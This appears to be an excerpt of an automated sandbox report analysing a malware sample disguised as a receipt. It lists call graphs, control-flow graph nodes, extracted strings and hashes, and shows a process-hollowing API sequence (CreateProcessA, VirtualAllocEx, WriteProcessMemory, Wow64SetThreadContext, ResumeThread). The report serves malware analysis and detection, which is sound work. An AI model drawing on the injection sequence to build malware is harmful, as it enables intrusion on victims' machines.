7575a28 51131->51243 51136 7578a83 51134->51136 51135 7579430 51135->51043 51137 7575be0 ReadProcessMemory 51136->51137 51138 7575bd9 ReadProcessMemory 51136->51138 51137->51135 51138->51135 51141 7575af0 WriteProcessMemory 51139->51141 51142 7575ae8 WriteProcessMemory 51139->51142 51140 7578e06 51140->51043 51141->51140 51142->51140 51145 7578a83 51143->51145 51144 7579430 51144->51043 51146 7575be0 ReadProcessMemory 51145->51146 51147 7575bd9 ReadProcessMemory 51145->51147 51146->51144 51147->51144 51149 7578bc0 51148->51149 51151 7575af0 WriteProcessMemory 51149->51151 51152 7575ae8 WriteProcessMemory 51149->51152 51150 7578bf2 51151->51150 51152->51150 51154 7578b4a 51153->51154 51156 7578adf 51153->51156 51163 7575af0 WriteProcessMemory 51154->51163 51164 7575ae8 WriteProcessMemory 51154->51164 51155 7578b0f 51155->51043 51158 75790c9 51155->51158 51165 7575470 ResumeThread 51155->51165 51166 7575468 ResumeThread 51155->51166 51156->51155 51160 7578a83 51156->51160 51157 7579383 51158->51043 51159 7579430 51159->51043 51161 7575be0 ReadProcessMemory 51160->51161 51162 7575bd9 ReadProcessMemory 51160->51162 51161->51159 51162->51159 51163->51155 51164->51155 51165->51157 51166->51157 51168 7578983 51167->51168 51174 7575d6c CreateProcessA 51168->51174 51175 7575d78 CreateProcessA 51168->51175 51169 75791ef 51169->51043 51170 7579430 51170->51043 51171 7578a5b 51171->51169 51172 7575be0 ReadProcessMemory 51171->51172 51173 7575bd9 ReadProcessMemory 51171->51173 51172->51170 51173->51170 51174->51171 51175->51171 51177 7578f55 51176->51177 51180 7575520 Wow64SetThreadContext 51177->51180 51181 7575519 Wow64SetThreadContext 51177->51181 51178 7578a83 51182 7575be0 ReadProcessMemory 51178->51182 51183 7575bd9 ReadProcessMemory 51178->51183 51179 7579430 51179->51043 51180->51178 51181->51178 51182->51179 51183->51179 51185 7578cb9 51184->51185 51186 75790ef 51185->51186 51187 7575a30 VirtualAllocEx 51185->51187 51188 7575a28 VirtualAllocEx 51185->51188 51186->51043 51187->51185 51188->51185 51190 7578cca 51189->51190 51191 75790ef 51190->51191 51192 7575a30 VirtualAllocEx 51190->51192 51193 7575a28 VirtualAllocEx 51190->51193 51191->51043 51192->51190 51193->51190 51195 7578ac2 51194->51195 51197 7575470 ResumeThread 51195->51197 51198 7575468 ResumeThread 51195->51198 51196 7579383 51197->51196 51198->51196 51200 7575b38 WriteProcessMemory 51199->51200 51202 7575b8f 51200->51202 51202->51068 51204 7575af0 WriteProcessMemory 51203->51204 51206 7575b8f 51204->51206 51206->51068 51208 75754b0 ResumeThread 51207->51208 51210 75754e1 51208->51210 51210->51073 51212 7575470 ResumeThread 51211->51212 51214 75754e1 51212->51214 51214->51073 51216 7575c2b ReadProcessMemory 51215->51216 51218 7575c6f 51216->51218 51218->51092 51220 7575be0 ReadProcessMemory 51219->51220 51222 7575c6f 51220->51222 51222->51092 51224 7575d78 CreateProcessA 51223->51224 51226 7575fc3 51224->51226 51226->51226 51228 7575e01 CreateProcessA 51227->51228 51230 7575fc3 51228->51230 51230->51230 51232 7575565 Wow64SetThreadContext 51231->51232 51234 75755ad 51232->51234 51234->51116 51236 7575565 Wow64SetThreadContext 51235->51236 51238 75755ad 51236->51238 51238->51116 51240 7575a70 VirtualAllocEx 51239->51240 51242 7575aad 51240->51242 51242->51131 51244 7575a30 VirtualAllocEx 51243->51244 51246 7575aad 51244->51246 51246->51131 51259 572efc8 51261 572f016 DrawTextExW 51259->51261 51262 572f06e 51261->51262 51263 a2b218 51264 a2b227 51263->51264 51266 a2b300 51263->51266 51267 a2b344 51266->51267 51268 a2b321 51266->51268 51267->51264 51268->51267 51269 a2b548 GetModuleHandleW 51268->51269 51270 a2b575 51269->51270 51270->51264 51271 a24668 51272 a2467a 51271->51272 51273 a24686 51272->51273 51275 a24778 51272->51275 51276 a2479d 51275->51276 51280 a24888 51276->51280 51284 a24878 51276->51284 51282 a248af 51280->51282 51281 a2498c 51281->51281 51282->51281 51288 a244b4 51282->51288 51285 a248af 51284->51285 51286 a2498c 51285->51286 51287 a244b4 CreateActCtxA 51285->51287 51287->51286 51289 a25918 CreateActCtxA 51288->51289 51291 a259db 51289->51291 51301 a2d7c8 DuplicateHandle 51302 a2d85e 51301->51302 51247 7579cf8 51252 7574228 51247->51252 51249 7579e9f 51251 7579d11 51251->51249 51256 7574188 51251->51256 51253 7574233 51252->51253 51254 7579e9f 51253->51254 51255 7574188 PostMessageW 51253->51255 51254->51251 51255->51254 51257 75799d0 PostMessageW 51256->51257 51258 7579a3c 51257->51258 51258->51249 51303 7579eb8 51304 7579ed2 51303->51304 51308 757a16f 51304->51308 51312 757a338 51304->51312 51305 7579f2e 51310 757a17d 51308->51310 51309 757a1e6 51309->51305 51310->51309 51311 7574228 PostMessageW 51310->51311 51311->51309 51314 757a583 51312->51314 51315 757a370 51312->51315 51313 7574228 PostMessageW 51313->51314 51314->51305 51315->51313 51315->51314

                                                                  Executed Functions

                                                                  Function 08B34117 Relevance: 8.9, Strings: 5, Instructions: 2606COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$4'dq$4'dq$4'dq$4'dq
                                                                  • API String ID: 0-1368831844
                                                                  • Opcode ID: fa85505531a2123b1b21166e10fed8c04c9f98f888477c3b2afda6cbdd0cced4
                                                                  • Instruction ID: d05abb2f66758964fc22c87ffc60709e585646deae88b676213ddb5786244b0c
                                                                  • Opcode Fuzzy Hash: fa85505531a2123b1b21166e10fed8c04c9f98f888477c3b2afda6cbdd0cced4
                                                                  • Instruction Fuzzy Hash: 0143C574A00229DFCB24DF68C988A9DB7B2BF99311F1585D9D409AB361DB31ED82CF50
                                                                  Function 08B33668 Relevance: 7.0, Strings: 5, Instructions: 720COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$(odq$,hq$,hq$Hhq
                                                                  • API String ID: 0-2569284993
                                                                  • Opcode ID: 27f2d9e3c20cd9f489aa948e5f8c3138417cac7e016096ecb3c9f61ca072a89e
                                                                  • Instruction ID: a827f2187aabdec56e4320347c3b6e83689c9f13338d94d47397552e3e2217e7
                                                                  • Opcode Fuzzy Hash: 27f2d9e3c20cd9f489aa948e5f8c3138417cac7e016096ecb3c9f61ca072a89e
                                                                  • Instruction Fuzzy Hash: A5526034A00225DFCB14DF69D494A6EBBF2FF88311B5581A9E816DB361DB35EC42CB90
                                                                  Function 00A23E34 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1533 a23e34-a26fc2 1536 a26fc4 1533->1536 1537 a26fc9-a27153 call a25c74 call a25c84 call a25c94 call a25ca4 call a201f8 * 4 1533->1537 1536->1537 1569 a27160-a27247 1537->1569 1570 a27155-a2715b 1537->1570 1583 a2724f 1569->1583 1571 a27252-a2725f 1570->1571 1583->1571
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `Y~l$t^~l
                                                                  • API String ID: 0-1894046990
                                                                  • Opcode ID: f924b9a06ce0e3d096fb7b4e3c0e88cc53fe256f248c7bba3a59e5cd0a93f5ba
                                                                  • Instruction ID: 17ff812e6f8bc640b72e34c2973d202c6c4221c73f150fc7c67aad140b17023e
                                                                  • Opcode Fuzzy Hash: f924b9a06ce0e3d096fb7b4e3c0e88cc53fe256f248c7bba3a59e5cd0a93f5ba
                                                                  • Instruction Fuzzy Hash: 9E81D674E002189FDF58DFA9D994AEEBBB2FF89300F208129E4196B365DB345942DF40
                                                                  Function 00A26F90 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1584 a26f90-a26fc2 1585 a26fc4 1584->1585 1586 a26fc9-a2701f call a25c74 call a25c84 1584->1586 1585->1586 1594 a2702a-a2704d call a25c94 call a25ca4 1586->1594 1598 a27052-a27153 call a201f8 * 4 1594->1598 1618 a27160-a2722e 1598->1618 1619 a27155-a2715b 1598->1619 1631 a27238-a27247 1618->1631 1620 a27252-a2725f 1619->1620 1632 a2724f 1631->1632 1632->1620
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `Y~l$t^~l
                                                                  • API String ID: 0-1894046990
                                                                  • Opcode ID: 389bd3de354c92991c08bf03fc974f5d6e4d285c435d360f04edb938dac8677c
                                                                  • Instruction ID: 1b8052fa1281636208f857f142034c696904d8fdc1dc9cf1e0e2cedbb9d54079
                                                                  • Opcode Fuzzy Hash: 389bd3de354c92991c08bf03fc974f5d6e4d285c435d360f04edb938dac8677c
                                                                  • Instruction Fuzzy Hash: A451D670E012589FCB48DFA9D995AEEBBB2BF89300F10812AD415BB365DB345946CF90
                                                                  Function 0757A16F Relevance: 1.9, Strings: 1, Instructions: 654COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1650 757a16f-757a17e 1652 757a182-757a191 1650->1652 1653 757a180 1650->1653 1655 757a1e6-757a1ff 1652->1655 1656 757a193-757a36a 1652->1656 1653->1652 1660 757adc8-757add6 1655->1660 1661 757a370-757a3ab call 75743ac call 75743bc call 75743cc 1656->1661 1662 757a71a-757a71f 1656->1662 1663 757ade7-757adef 1660->1663 1664 757add8-757ade1 1660->1664 1680 757a3be-757a3de 1661->1680 1681 757a3ad-757a3b7 1661->1681 1668 757a721-757a723 1662->1668 1669 757a729-757a72c 1662->1669 1666 757ae01-757ae03 1663->1666 1667 757adf1-757adfb 1663->1667 1664->1663 1667->1666 1668->1669 1674 757a734-757a73c 1669->1674 1676 757a742-757a749 1674->1676 1683 757a3f1-757a411 1680->1683 1684 757a3e0-757a3ea 1680->1684 1681->1680 1686 757a424-757a444 1683->1686 1687 757a413-757a41d 1683->1687 1684->1683 1689 757a457-757a460 call 75743dc 1686->1689 1690 757a446-757a450 1686->1690 1687->1686 1693 757a484-757a48d call 75743ec 1689->1693 1694 757a462-757a47d call 75743dc 1689->1694 1690->1689 1699 757a4b1-757a4ba call 75743fc 1693->1699 1700 757a48f-757a4aa call 75743ec 1693->1700 1694->1693 1706 757a4c5-757a4e1 1699->1706 1707 757a4bc-757a4c0 call 757440c 1699->1707 1700->1699 1711 757a4e3-757a4e9 1706->1711 1712 757a4f9-757a4fd 1706->1712 1707->1706 1713 757a4ed-757a4ef 1711->1713 1714 757a4eb 1711->1714 1715 757a517-757a55f 1712->1715 1716 757a4ff-757a510 call 757441c 1712->1716 1713->1712 1714->1712 1722 757a583-757a58a 1715->1722 1723 757a561 1715->1723 1716->1715 1725 757a5a1-757a5af call 7579f38 1722->1725 1726 757a58c-757a59b 1722->1726 1724 757a564-757a56a 1723->1724 1727 757a570-757a576 1724->1727 1728 757a74a-757a758 1724->1728 1735 757a5b1-757a5b3 1725->1735 1736 757a5b9-757a5e3 1725->1736 1726->1725 1730 757a580-757a581 1727->1730 1731 757a578-757a57a 1727->1731 1737 757a6ef-757a6f5 1728->1737 1738 757a75a-757a789 1728->1738 1730->1722 1730->1724 1731->1730 1735->1736 1751 757a5e5-757a5f3 1736->1751 1752 757a610-757a62c 1736->1752 1742 757a6f7-757a6fb 1737->1742 1743 757a701-757a719 1737->1743 1739 757a7e7-757a7f7 1738->1739 1740 757a78b-757a7ac 1738->1740 1748 757a9cd-757a9d4 1739->1748 1749 757a7fd-757a807 1739->1749 1740->1739 1750 757a7ae-757a7b4 1740->1750 1742->1743 1755 757a9d6-757a9de call 7574228 1748->1755 1756 757a9e3-757a9f6 1748->1756 1753 757a811-757a81b 1749->1753 1754 757a809-757a810 1749->1754 1757 757a7b6-757a7b8 1750->1757 1758 757a7c2-757a7c7 1750->1758 1751->1752 1766 757a5f5-757a609 1751->1766 1768 757a63f-757a666 call 7579f48 1752->1768 1769 757a62e-757a638 1752->1769 1759 757a821-757a861 1753->1759 1760 757aa00-757abc3 1753->1760 1755->1756 1757->1758 1763 757a7d3-757a7e0 1758->1763 1764 757a7c9-757a7cd 1758->1764 1789 757a863-757a869 1759->1789 1790 757a879-757a87d 1759->1790 1760->1660 1763->1739 1764->1763 1766->1752 1779 757a67e-757a682 1768->1779 1780 757a668-757a66e 1768->1780 1769->1768 1784 757a684-757a696 1779->1784 1785 757a69d-757a6b9 1779->1785 1782 757a672-757a674 1780->1782 1783 757a670 1780->1783 1782->1779 1783->1779 1784->1785 1792 757a6d1-757a6d5 1785->1792 1793 757a6bb-757a6c1 1785->1793 1797 757a86d-757a86f 1789->1797 1798 757a86b 1789->1798 1794 757a87f-757a8a4 1790->1794 1795 757a8aa-757a8c2 call 757a05c 1790->1795 1792->1676 1801 757a6d7-757a6e5 1792->1801 1799 757a6c5-757a6c7 1793->1799 1800 757a6c3 1793->1800 1794->1795 1811 757a8c4-757a8c9 1795->1811 1812 757a8cf-757a8d7 1795->1812 1797->1790 1798->1790 1799->1792 1800->1792 1801->1742 1808 757a6e7-757a6f5 1801->1808 1808->1742 1808->1743 1811->1812 1815 757a8ed-757a90c 1812->1815 1816 757a8d9-757a8e7 1812->1816 1820 757a924-757a928 1815->1820 1821 757a90e-757a914 1815->1821 1816->1815 1824 757a981-757a9ca 1820->1824 1825 757a92a-757a937 1820->1825 1822 757a916 1821->1822 1823 757a918-757a91a 1821->1823 1822->1820 1823->1820 1824->1748 1829 757a96d-757a97a 1825->1829 1830 757a939-757a96b 1825->1830 1829->1824 1830->1829
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dZk^
                                                                  • API String ID: 0-4277263025
                                                                  • Opcode ID: 0f971e9010b3d60c9ca7c554813bde6cae294e53b97401539cb56c37ba2a5bf9
                                                                  • Instruction ID: 396365bdc4b5265c1821a519eaf6a455fe5ceea8b3d9b8b00b2090f6d5e0ca43
                                                                  • Opcode Fuzzy Hash: 0f971e9010b3d60c9ca7c554813bde6cae294e53b97401539cb56c37ba2a5bf9
                                                                  • Instruction Fuzzy Hash: C5329EB0B012158FDB19DB79E550BAEBBF6BF89300F14846AE5069B3A1CB31ED41CB51
                                                                  Function 08B31240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1838 8b31240-8b31271 1839 8b31273 1838->1839 1840 8b31278-8b3133d 1838->1840 1839->1840 1846 8b3138b-8b3139c 1840->1846 1847 8b3133f-8b31377 1846->1847 1848 8b3139e-8b31406 1846->1848 1851 8b31379 1847->1851 1852 8b3137e-8b31388 1847->1852 1856 8b31c60-8b31c8b 1848->1856 1851->1852 1852->1846 1858 8b31cb8-8b31cba 1856->1858 1859 8b31c8d-8b31cb6 1856->1859 1860 8b31cc0-8b31cd4 1858->1860 1859->1860 1862 8b3140b-8b31412 1860->1862 1863 8b31cda-8b31ce1 1860->1863 1864 8b31464-8b3149f 1862->1864 1866 8b314a5-8b314ae 1864->1866 1867 8b31414-8b3142a 1864->1867 1870 8b314b1-8b314e5 1866->1870 1868 8b31431-8b3144f 1867->1868 1869 8b3142c 1867->1869 1871 8b31451 1868->1871 1872 8b31456-8b31461 1868->1872 1869->1868 1874 8b314e7-8b31501 1870->1874 1875 8b31504-8b3152b 1870->1875 1871->1872 1872->1864 1874->1875 1878 8b31558 1875->1878 1879 8b3152d-8b31556 1875->1879 1880 8b31562-8b31570 1878->1880 1879->1880 1882 8b31660-8b3170d 1880->1882 1883 8b31576-8b3157d 1880->1883 1907 8b31713-8b31715 1882->1907 1908 8b3170f 1882->1908 1884 8b31643-8b31654 1883->1884 1886 8b31582-8b31598 1884->1886 1887 8b3165a-8b3165b 1884->1887 1888 8b3159a 1886->1888 1889 8b3159f-8b315fd 1886->1889 1890 8b31c07-8b31c42 1887->1890 1888->1889 1900 8b31604-8b31629 1889->1900 1901 8b315ff 1889->1901 1890->1870 1895 8b31c48-8b31c5f 1890->1895 1895->1856 1905 8b3162b-8b31637 1900->1905 1906 8b3163f-8b31640 1900->1906 1901->1900 1905->1906 1906->1884 1911 8b3171c-8b31723 1907->1911 1909 8b31711 1908->1909 1910 8b31717 1908->1910 1909->1907 1910->1911 1912 8b31731-8b31762 1911->1912 1913 8b31725-8b3172e 1911->1913 1915 8b317b5-8b317f0 1912->1915 1913->1912 1917 8b317f6-8b31809 1915->1917 1918 8b31764-8b31779 1915->1918 1922 8b31811-8b318dd 1917->1922 1923 8b3180b-8b319b2 1917->1923 1920 8b31780-8b3179e 1918->1920 1921 8b3177b 1918->1921 1924 8b317a0 1920->1924 1925 8b317a5-8b317b2 1920->1925 1921->1920 1945 8b318e7-8b318fd 1922->1945 1928 8b319b4-8b319b5 1923->1928 1929 8b319ba-8b31a59 1923->1929 1924->1925 1925->1915 1930 8b31bc2-8b31bef 1928->1930 1949 8b31a60-8b31a92 1929->1949 1950 8b31a5b 1929->1950 1934 8b31bf1-8b31c05 1930->1934 1935 8b31c06 1930->1935 1934->1935 1935->1890 1947 8b31904-8b31917 1945->1947 1948 8b318ff 1945->1948 1951 8b31919 1947->1951 1952 8b3191e-8b3192b 1947->1952 1948->1947 1956 8b31a94 1949->1956 1957 8b31a99-8b31acb 1949->1957 1950->1949 1951->1952 1953 8b31932-8b31956 1952->1953 1954 8b3192d 1952->1954 1960 8b31958 1953->1960 1961 8b3195d-8b31977 1953->1961 1954->1953 1956->1957 1962 8b31ad2-8b31b2f 1957->1962 1963 8b31acd 1957->1963 1960->1961 1964 8b319a2-8b319a3 1961->1964 1965 8b31979-8b31998 1961->1965 1970 8b31b81-8b31ba3 1962->1970 1971 8b31b31-8b31b7b 1962->1971 1963->1962 1964->1930 1966 8b3199a 1965->1966 1967 8b3199f 1965->1967 1966->1967 1967->1964 1975 8b31bad-8b31bc0 1970->1975 1971->1970 1975->1930
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1694046517.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8b30000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: e0099293dc9bbe6083cc7da64177360fd4ab31d94bc91cbb3a2f4f60dd87d882
                                                                  • Instruction ID: 3ed564ba8addbbb571162973d25a6b43b19d7893d1e4bf02e2b59ad0b6abdd41
                                                                  • Opcode Fuzzy Hash: e0099293dc9bbe6083cc7da64177360fd4ab31d94bc91cbb3a2f4f60dd87d882
                                                                  • Instruction Fuzzy Hash: E962BE74E01228CFDB24DF69C984BDDBBB6BB49301F1081E9E409AB255DB34AE85CF50
                                                                  Function 0757001D Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ae11a7f186a481de0f09a7579d2efc7c03e9f43b96f93dce40ee028a5e6608c
                                                                  • Instruction ID: 981be329610bab8f74f529c8b06d8d2a46197cd48a4af511c3c75be3ec7a1f31
                                                                  • Opcode Fuzzy Hash: 3ae11a7f186a481de0f09a7579d2efc7c03e9f43b96f93dce40ee028a5e6608c
                                                                  • Instruction Fuzzy Hash: 2D211CB1D052598FEB09CF67D9147EEBFF6AF8A300F08C16AD408A62A5DB740945CF50
                                                                  Function 07570040 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c309142cdb15228f6049413a528785fc70bafd81ee5f3aa5c68c85415cc9275
                                                                  • Instruction ID: 1ae9e6a3f0ef840ec11d9d8beada1377bad618e2791ebc58dffd6d2682cf99e7
                                                                  • Opcode Fuzzy Hash: 1c309142cdb15228f6049413a528785fc70bafd81ee5f3aa5c68c85415cc9275
                                                                  • Instruction Fuzzy Hash: 6221C4B0D056198BEB18CFABD8047EEFAF6BFC9310F04C56AD409A62A4DB740945CF90
                                                                  Function 00A2D570 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1296 a2d570-a2d60f GetCurrentProcess 1300 a2d611-a2d617 1296->1300 1301 a2d618-a2d64c GetCurrentThread 1296->1301 1300->1301 1302 a2d655-a2d689 GetCurrentProcess 1301->1302 1303 a2d64e-a2d654 1301->1303 1304 a2d692-a2d6ad call a2d74f 1302->1304 1305 a2d68b-a2d691 1302->1305 1303->1302 1309 a2d6b3-a2d6e2 GetCurrentThreadId 1304->1309 1305->1304 1310 a2d6e4-a2d6ea 1309->1310 1311 a2d6eb-a2d74d 1309->1311 1310->1311
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D5FE
                                                                  • GetCurrentThread.KERNEL32 ref: 00A2D63B
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D678
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A2D6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: df74306772683ff5a560064f4c79faeac38d2c8815fad3ca05caaf07f8025582
                                                                  • Instruction ID: f7f13fe34b62ff631fe0cc882e8db09168068eb9dc50c23d590dabff38439f9d
                                                                  • Opcode Fuzzy Hash: df74306772683ff5a560064f4c79faeac38d2c8815fad3ca05caaf07f8025582
                                                                  • Instruction Fuzzy Hash: 195169B09003498FDB14DFAAD548BDEBFF1EF48314F208469E419A72A1D7349944CB65
                                                                  Function 00A2D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1318 a2d580-a2d60f GetCurrentProcess 1322 a2d611-a2d617 1318->1322 1323 a2d618-a2d64c GetCurrentThread 1318->1323 1322->1323 1324 a2d655-a2d689 GetCurrentProcess 1323->1324 1325 a2d64e-a2d654 1323->1325 1326 a2d692-a2d6ad call a2d74f 1324->1326 1327 a2d68b-a2d691 1324->1327 1325->1324 1331 a2d6b3-a2d6e2 GetCurrentThreadId 1326->1331 1327->1326 1332 a2d6e4-a2d6ea 1331->1332 1333 a2d6eb-a2d74d 1331->1333 1332->1333
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D5FE
                                                                  • GetCurrentThread.KERNEL32 ref: 00A2D63B
                                                                  • GetCurrentProcess.KERNEL32 ref: 00A2D678
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A2D6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: b4b4d8ecf959e06209a33de50a6a7f3839ba9e588ddaaebae23cc2fb000fcf55
                                                                  • Instruction ID: a698ff6875ae7bb791ca5734b09b8a37ebc9715d0fcb219de9bf8f3f55b6bd6d
                                                                  • Opcode Fuzzy Hash: b4b4d8ecf959e06209a33de50a6a7f3839ba9e588ddaaebae23cc2fb000fcf55
                                                                  • Instruction Fuzzy Hash: 065147B09003498FDB14DFAAD548BAEBBF1EF88314F20C469E419A7391D774A944CB65
                                                                  Function 072E9250 Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1389 72e9250-72e925d 1390 72e925f-72e9276 1389->1390 1391 72e9208-72e9240 1389->1391 1393 72e9333-72e9342 1390->1393 1395 72e934d-72e93ae 1393->1395 1410 72e932a 1395->1410 1412 72e9287-72e9331 1410->1412 1413 72e9280 1410->1413 1412->1410 1413->1393 1413->1412 1414 72e92b7-72e92d5 1413->1414 1415 72e9315-72e9329 1413->1415 1420 72e92dc-72e92e9 1414->1420 1421 72e92d7-72e92da 1414->1421 1422 72e92eb-72e92fa 1420->1422 1421->1422 1425 72e92fc-72e9302 1422->1425 1426 72e9312 1422->1426 1427 72e9306-72e9308 1425->1427 1428 72e9304 1425->1428 1426->1415 1427->1426 1428->1426
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8hq$8hq$8hq
                                                                  • API String ID: 0-1838490158
                                                                  • Opcode ID: 9568a1a8d5ebed37d5683617108be751b0326c35c9850bcb3ea1ec7038ae4f9c
                                                                  • Instruction ID: ca6a6293c308f8bd6f7dcd79010dae13d9b309a2a2d669fe8e7b0ac745f06160
                                                                  • Opcode Fuzzy Hash: 9568a1a8d5ebed37d5683617108be751b0326c35c9850bcb3ea1ec7038ae4f9c
                                                                  • Instruction Fuzzy Hash: 09312CF0A38206DFDF009AA484555BE77B9EBCA300F918057D5C7973C0D6B16C8287A3
                                                                  Function 072E839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1451 72e839f-72e83d7 1453 72e83e0-72e83e2 1451->1453 1454 72e83fa-72e8417 1453->1454 1455 72e83e4-72e83ea 1453->1455 1459 72e841d-72e8513 1454->1459 1460 72e8582-72e8587 1454->1460 1456 72e83ee-72e83f0 1455->1456 1457 72e83ec 1455->1457 1456->1454 1457->1454
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$$dq$$dq
                                                                  • API String ID: 0-2227312764
                                                                  • Opcode ID: 1c89af8d75e090a502c8e6514b1fed43f806f74545a8a86adec047053d8ace38
                                                                  • Instruction ID: 047c46b3310292d4cb8297c265c357e6db84fb7bfe64f97e79170928ca12b239
                                                                  • Opcode Fuzzy Hash: 1c89af8d75e090a502c8e6514b1fed43f806f74545a8a86adec047053d8ace38
                                                                  • Instruction Fuzzy Hash: BF01FEB0770306DFE7108B24DC1A7AA7776FB00704F699856EC859F6C1EAB09D90C791
                                                                  Function 07575519 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
